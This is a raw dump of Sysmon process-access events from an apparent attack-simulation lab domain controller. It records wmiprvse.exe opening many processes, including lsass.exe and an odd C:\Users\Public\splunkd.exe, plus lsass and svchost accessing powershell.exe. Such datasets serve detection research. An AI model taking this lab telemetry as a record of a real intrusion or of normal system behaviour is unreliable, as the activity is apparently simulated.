15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.303{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.303{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.257{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 